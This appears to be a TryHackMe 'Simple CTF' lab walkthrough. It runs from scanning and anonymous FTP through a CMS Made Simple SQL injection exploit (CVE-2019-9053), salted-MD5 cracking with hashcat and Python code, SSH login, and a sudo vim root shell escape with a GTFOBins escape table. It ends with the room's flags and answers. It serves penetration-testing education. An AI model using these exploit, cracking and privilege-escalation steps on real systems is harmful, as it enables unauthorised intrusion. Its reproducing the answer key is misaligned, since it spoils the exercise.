THM_SimpleCTF_Walkthrough
Simple Walkthrough for a TryHackMe Room
SimpleCTF TryHackMe
performed by: jb-williams
Simple CTF
Deploy the machine and attempt the questions!
Initial Scan
- First we run `nmap` on the target IP. The first scan didn't give me any info and even suggested adding `-Pn` to the command (skip host discovery and scan the address even though it looks down):

```bash
nmap -v -T4 -sV -sC -Pn -oA nmap/initial 10.10.237.242
```

- This output will provide the answers for the first two questions. `-oA` writes the same results in normal, XML and greppable form (`nmap/initial.nmap`, `.xml` and `.gnmap`).
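The walkthrough reads those two answers off the scan by eye. As an added example (not part of the original post), here is a small parser for the greppable `nmap/initial.gnmap` file that `-oA` writes, which answers the same two questions from the file. The sample output is constructed: the three open ports are the ones the room exposes, the version strings are illustrative, and the function names are my own.

```python
from typing import Dict, List, Optional

# Constructed sample of nmap's greppable output (the .gnmap file -oA writes).
# The three open ports match the room; the version strings are illustrative.
SAMPLE_GNMAP = """\
# Nmap scan initiated as: nmap -v -T4 -sV -sC -Pn -oA nmap/initial 10.10.237.242
Host: 10.10.237.242 ()\tStatus: Up
Host: 10.10.237.242 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, 2222/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)/\tIgnored State: filtered (997)
# Nmap done -- 1 IP address (1 host up) scanned
"""


def parse_gnmap(text: str) -> List[Dict[str, object]]:
    """Return one record per port from the 'Ports:' field of each host line.

    Each entry is port/state/proto/owner/service/rpc_info/version/; nmap
    replaces any '/' inside the version string with '|', so splitting on
    '/' is safe.
    """
    records: List[Dict[str, object]] = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the tab before "Ignored State:" (if present).
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0].strip()
        for entry in ports_field.split(", "):
            parts = entry.split("/")
            if len(parts) < 7:
                continue
            records.append({
                "host": host,
                "port": int(parts[0]),
                "state": parts[1],
                "proto": parts[2],
                "service": parts[4],
                "version": parts[6],
            })
    return records


def open_ports(records: List[Dict[str, object]]) -> List[Dict[str, object]]:
    return [r for r in records if r["state"] == "open"]


def count_services_below(records: List[Dict[str, object]], limit: int = 1000) -> int:
    """Question 1: how many open services sit below the given port number."""
    return sum(1 for r in open_ports(records) if r["port"] < limit)


def highest_port_service(records: List[Dict[str, object]]) -> Optional[str]:
    """Question 2: the service name on the highest open port."""
    ports = open_ports(records)
    return max(ports, key=lambda r: r["port"])["service"] if ports else None


if __name__ == "__main__":
    recs = parse_gnmap(SAMPLE_GNMAP)
    for r in recs:
        print(f"{r['port']}/{r['proto']} {r['state']:<6} {r['service']:<5} {r['version']}")
    print("services under port 1000:", count_services_below(recs))
    print("service on the highest port:", highest_port_service(recs))
```

Point it at the real file with `parse_gnmap(open("nmap/initial.gnmap").read())`; the same records also give you the service/version pairs to feed into `searchsploit` later.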
- In the `nmap` output I noticed that the `ftp` service on port 21 allowed anonymous login.
- Login to FTP:

```bash
ftp -p 10.10.237.242
```

- Log in as user `anonymous` (any password is accepted for an anonymous login).
- Running `passive` toggles passive mode. `-p` already started the client in passive mode, so if you see

```text
Passive mode: off; fallback to active mode: off.
```

you have just switched it off; run `passive` once more so that it reads `on`. Passive mode is the safer choice behind NAT or a VPN, since active mode needs the server to connect back to your client for every data transfer.
- Then running `ls` will show a directory called `pub`.
- Change into that directory with `cd pub` and run `ls` again. You will see a file called `ForMitch.txt`.
- To download all files in the directory, including `ForMitch.txt`, run `mget *` (answer `y` at each prompt, or run `prompt` first to turn the prompting off), then `exit` back out to your terminal.
- Viewing the contents of `ForMitch.txt` with `cat`, you see that the user Mitch has a very simple password that is easy to crack.
- I ran `feroxbuster` against the target while I was going over the nmap output and the FTP share:

```bash
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.237.242/
```

- `-P` is the replay proxy: every hit is re-sent through a proxy on `localhost:8080` (Burp); drop it if nothing is listening there. `-s` limits the output to the listed status codes, `-e` extracts links from the responses, and `-t`/`-L` cap the threads and concurrent scans.
- The main finds were the paths `/simple/` and `/simple/admin/`.
- Browsing to `/simple/` we see that the site runs the content management system CMS Made Simple. Looking at the bottom left of that page, the version is `2.2.8`.
- Using `searchsploit` we can see if there are any known exploits for this version:

```bash
searchsploit cms made simple 2.2.8
```

- The output shows a known exploit, `CMS Made Simple < 2.2.10 - SQL Injection`, at the exploit path `php/webapps/46635.py`.
- To read the exploit (and get its full path) run:

```bash
searchsploit -x 46635.py
```

- Reading it, I noticed that it can be run with `-u` for the URL, `-w` for the path to a wordlist and `--crack` to crack the password, so I exited the pager. On leaving the pager, searchsploit shows the full path to the exploit:

```text
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
```
- I copied that exploit to my working directory (`searchsploit -m 46635` does the same) and ran it:

```bash
python3 46635.py -u http://10.10.237.242/simple --crack -w ~/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
```

- Got an error and opened it up in a text editor. (Check the wordlist path as well: `~/usr/share/seclists/...` only exists if you keep a copy of SecLists under your home directory; the packaged copy lives at `/usr/share/seclists/...`, and `--crack` cannot do anything with a path that does not exist.)
- I noticed that the script started with `#!/usr/bin/env python`; I changed it to `#!/usr/bin/env python3`.
- I also noticed that all the `print` statements were in Python 2 syntax, not Python 3, so every `print "<Stuff>"` needs to become `print("<Stuff>")`.
- To do this quickly all at once I closed the text editor and ran this command on `46635.py`.

note: this didn't fully work... one edit needed to be made, shown below

```bash
sed -i 's#".*"#(&)#g' 46635.py
```

- Thought I was being clever, but `".*"` is greedy: it matches from the first to the last double quote on a line and wraps that span in parentheses, so it double-parenthesised a print statement for me on line 183. I changed that line from:

```python
print colored(("<Stuffs>"))
```

to

```python
print (colored("<Stuffs>"))
```
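The sed one-liner above only looks for quotes, so it also rewrites any other double-quoted string on a line and mishandles `print colored(...)`. The standard tool for this job is `2to3 -w 46635.py` (shipped with CPython up to 3.12). As an added example, not code from the original post or from the exploit, here is a small converter that only touches lines that start with a Python 2 `print` statement and handles the cases that bite in a script like this one; the sample Python 2 snippet is constructed to resemble the exploit's style, and the function names are my own.

```python
import re

# Python 2 print statement: indent, the keyword, whitespace, the arguments.
# Lines such as "print(x)" (no whitespace after the keyword) never match.
_PRINT_STMT = re.compile(r"^(?P<indent>\s*)print\s+(?P<args>.+?)\s*$")
_BARE_PRINT = re.compile(r"^(?P<indent>\s*)print\s*$")


def _single_group(args: str) -> bool:
    """True if args is one parenthesised group, e.g. ("x") or (colored("x")),
    meaning the line is already a Python 3 call. Parentheses inside string
    literals are not special-cased; good enough for a script like this one."""
    if not (args.startswith("(") and args.endswith(")")):
        return False
    depth = 0
    for i, ch in enumerate(args):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0 and i != len(args) - 1:
                return False  # first group closes early: print (a) + (b)
    return depth == 0


def convert_print_line(line: str) -> str:
    """Rewrite one Python 2 print statement as a Python 3 call; other lines pass through."""
    bare = _BARE_PRINT.match(line)
    if bare:
        return bare.group("indent") + "print()"
    m = _PRINT_STMT.match(line)
    if not m:
        return line
    indent, args = m.group("indent"), m.group("args")
    if _single_group(args):
        return line
    if args.startswith(">>"):  # print >>sys.stderr, "msg"
        target, _, rest = args[2:].partition(",")
        return f"{indent}print({rest.strip()}, file={target.strip()})"
    if args.endswith(","):  # a trailing comma suppressed the newline
        return f"{indent}print({args[:-1].rstrip()}, end=' ')"
    return f"{indent}print({args})"


def convert_source(src: str) -> str:
    """Fix the shebang and every print statement in a whole file's text."""
    lines = src.splitlines()
    if lines and lines[0].strip() == "#!/usr/bin/env python":
        lines[0] = "#!/usr/bin/env python3"
    out = "\n".join(convert_print_line(l) for l in lines)
    return out + "\n" if src.endswith("\n") else out


def is_valid_python3(src: str) -> bool:
    """Syntax check only; names such as `salt` need not exist."""
    try:
        compile(src, "<converted>", "exec")
        return True
    except SyntaxError:
        return False


# Constructed Python 2 snippet in the style of 46635.py. Note the `headers`
# line: a double-quoted string that is not a print statement and must be left alone.
SAMPLE_PY2 = '''#!/usr/bin/env python
from termcolor import colored
def beautify_print_try(value):
    print colored("[*] Trying: " + value, "yellow")
headers = {"Content-Type": "application/x-www-form-urlencoded"}
print "[+] Salt for password found: " + salt
print >>sys.stderr, "usage: %s -u URL" % sys.argv[0]
print("already converted")
'''

if __name__ == "__main__":
    converted = convert_source(SAMPLE_PY2)
    print(converted)
    print("valid Python 3:", is_valid_python3(converted))
```

To convert the real file: `open("46635.py", "w").write(convert_source(open("46635.py").read()))`, after taking a copy. The `compile()` check is the cheap way to confirm nothing was left in Python 2 syntax before you run the exploit against the target.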
- With that done I re-ran:

```bash
python3 46635.py -u http://10.10.237.242/simple --crack -w ~/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
```

- The `--crack` option didn't work, but I did get output: the salt for the password, a username, an email, and a hashed password.

```text
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
```
- If you run the password hash through `hash-identifier`, it says the hash is most likely `MD5` (32 hex characters; the tool cannot tell you how the salt was mixed in):

```bash
hash-identifier 0c01f4468bd75d7a84c7eb73846e8d96
```

- We can use `hashcat` to crack this. Put the hash in `passwordhash:salt` format:

```bash
hashcat -O -a 0 -m 10 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt --show
```

```text
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
```

- `-O` enables the optimized kernels (faster, at the cost of a lower maximum password length).
- `-a 0` is the attack mode: 0 is a straight dictionary attack. It says nothing about the hash type.
- `-m 10` is the hash mode: `md5($pass.$salt)`, which is why the input has to be written as `passwordhash:salt`. The exploit's own `--crack` routine computes `md5(salt + password)` instead, which is hashcat mode 20 (`md5($salt.$pass)`); if mode 10 finds nothing, re-run with `-m 20`.
- `--show` only prints entries already in hashcat's potfile (`~/.local/share/hashcat/hashcat.potfile` on recent versions); run the command without `--show` first to do the cracking, then add it to display the result in the form above.
- After the hash and salt, the last argument is the path to the rockyou.txt wordlist.
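Because the salt order (mode 10 versus mode 20) is the usual reason a salted-MD5 run comes back empty, here is an added example, not code from the post or from the exploit, that does the same dictionary attack in Python and tries both orders for every candidate, reporting which hashcat mode matched. The hash and salt are the ones the exploit printed above; the tiny wordlist is constructed, and the function names are my own.

```python
import hashlib
from typing import Callable, Dict, Iterable, Optional, Tuple

# Values the exploit printed for this box (taken from the page above).
PAGE_HASH = "0c01f4468bd75d7a84c7eb73846e8d96"
PAGE_SALT = "1dac0d92e9fa6bb2"

# hashcat's two plain salted-MD5 layouts. Mode 10 is md5($pass.$salt);
# mode 20 is md5($salt.$pass), the order 46635.py's --crack routine uses.
MODES: Dict[int, Callable[[str, str], str]] = {
    10: lambda pw, salt: hashlib.md5((pw + salt).encode()).hexdigest(),
    20: lambda pw, salt: hashlib.md5((salt + pw).encode()).hexdigest(),
}


def crack_salted_md5(target_hash: str, salt: str, wordlist: Iterable[str]) -> Optional[Tuple[int, str]]:
    """Dictionary attack that tries both salt orders for every candidate.

    Returns (hashcat_mode, password) on the first hit, or None. `wordlist`
    may be a list or an open file (trailing newlines are stripped).
    """
    target_hash = target_hash.lower()
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        for mode, digest in MODES.items():
            if digest(candidate, salt) == target_hash:
                return mode, candidate
    return None


def hashcat_line(target_hash: str, salt: str) -> str:
    """The hash:salt input format hashcat expects for modes 10 and 20."""
    return f"{target_hash}:{salt}"


if __name__ == "__main__":
    # Constructed mini-wordlist. On a real run pass
    # open("/usr/share/wordlists/rockyou.txt", errors="ignore") instead;
    # rockyou contains bytes that are not valid UTF-8.
    words = ["password", "123456", "secret", "letmein"]
    print("input for hashcat:", hashcat_line(PAGE_HASH, PAGE_SALT))
    hit = crack_salted_md5(PAGE_HASH, PAGE_SALT, words)
    if hit:
        print(f"cracked with hashcat mode {hit[0]}: {hit[1]}")
    else:
        print("no candidate matched in either salt order")
```

Whichever mode this reports for the real hash is the `-m` value to use with hashcat on the full rockyou list; trying both orders in Python is cheap for a handful of candidates, but for a full wordlist let hashcat do the work.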
- Having found the password for mitch, we attempt to log in over SSH on port 2222:

```bash
ssh mitch@10.10.237.242 -p 2222
```

- After logging in, run `ls` and you see `user.txt`:

```bash
cat user.txt
```

- Also, running `ls /home` lets you see if there are any other users' home folders.
- After getting the user.txt flag I ran `sudo -l` to see if there was anything I could run through sudo as this user, and you can see that they are allowed to run `vim` as root without a password.
- Navigate to GTFOBins and search for `vim`; it lists a couple of commands for spawning a shell from the editor (anything vim runs with `:!` inherits the root privileges sudo gave it). I tried option (a):

```bash
sudo vim -c ':!/bin/bash'
```

- Running `whoami` shows that you are now `root`.
- Run a quick `ls /root` and you see `root.txt`:

```bash
cat /root/root.txt
```
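The `sudo -l` step above is a manual lookup: read the rules, then check each binary against GTFOBins. As an added example (not from the original post), here is that check in code: a parser for `sudo -l` output plus a small table of GTFOBins sudo escapes, which flags every rule that hands out a root shell and whether it needs a password. The `sudo -l` text is constructed in the shape the box returns for mitch, with two extra rules for contrast; the GTFOBins table is a hand-picked subset, and the function names are my own.

```python
import os
import re
from typing import Dict, List

# Constructed `sudo -l` output in the shape the box returns for mitch. The vim
# line is the one the walkthrough uses; the other two are added for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/apt-get
    (ALL : ALL) NOPASSWD: /usr/bin/id
"""

# A small subset of the GTFOBins "sudo" entries, keyed by binary name.
GTFOBINS_SUDO: Dict[str, str] = {
    "vim": "sudo vim -c ':!/bin/sh'",
    "vi": "sudo vi -c ':!/bin/sh'",
    "less": "sudo less /etc/profile   (then type !/bin/sh)",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "apt-get": "sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
}

# One sudoers rule line: "(runas) [TAG: ...] /path/cmd [args][, /path/cmd2 ...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """Return one entry per command listed under 'may run the following commands'."""
    entries: List[Dict[str, object]] = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = m.group("tags").replace(":", " ").split()
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            entries.append({
                "runas": m.group("runas").split(":")[0].strip(),  # user part of "user : group"
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd,
                "binary": os.path.basename(cmd.split()[0]),
            })
    return entries


def find_shell_escapes(entries: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Entries that can be run as root and whose binary has a known sudo shell escape."""
    hits = []
    for e in entries:
        if e["runas"] not in ("root", "ALL"):
            continue
        escape = "sudo /bin/sh" if e["command"] == "ALL" else GTFOBINS_SUDO.get(e["binary"])
        if escape:
            hits.append({**e, "escape": escape})
    return hits


if __name__ == "__main__":
    for hit in find_shell_escapes(parse_sudo_l(SAMPLE_SUDO_L)):
        pw = "no password needed" if hit["nopasswd"] else "password required"
        print(f"{hit['command']:<20} {pw:<20} -> {hit['escape']}")
```

Run it against real output with `parse_sudo_l(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout)`. The same check is worth running from the defender's side: any rule that grants root on an editor, pager or interpreter is a root shell, with or without `NOPASSWD`.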
Answers
How many services are running under port 1000?
- Answer:
2
What is running on the higher port?
- Answer:
ssh
What's the CVE you're using against the application?
- Answer:
CVE-2019-9053
(found in the comments of the exploit code)
To what kind of vulnerability is the application vulnerable?
- Answer:
sqli
What’s the password?
- Answer:
secret
Where can you login with the details obtained?
- Answer:
ssh
What's the user flag?
- Answer:
G00d j0b, keep up!
Is there any other user in the home directory? What’s its name?
- Answer:
sunbath
What can you leverage to spawn a privileged shell?
- Answer:
vim
What’s the root flag?
- Answer:
W3ll d0n3. You made it!
written and performed by jb-williams - github
linux pentest escalation sudo scanning python searchsploit gobuster feroxbuster ftp hashcat vim cms tryhackme simpleCTF walkthrough
2023-04-17 15:34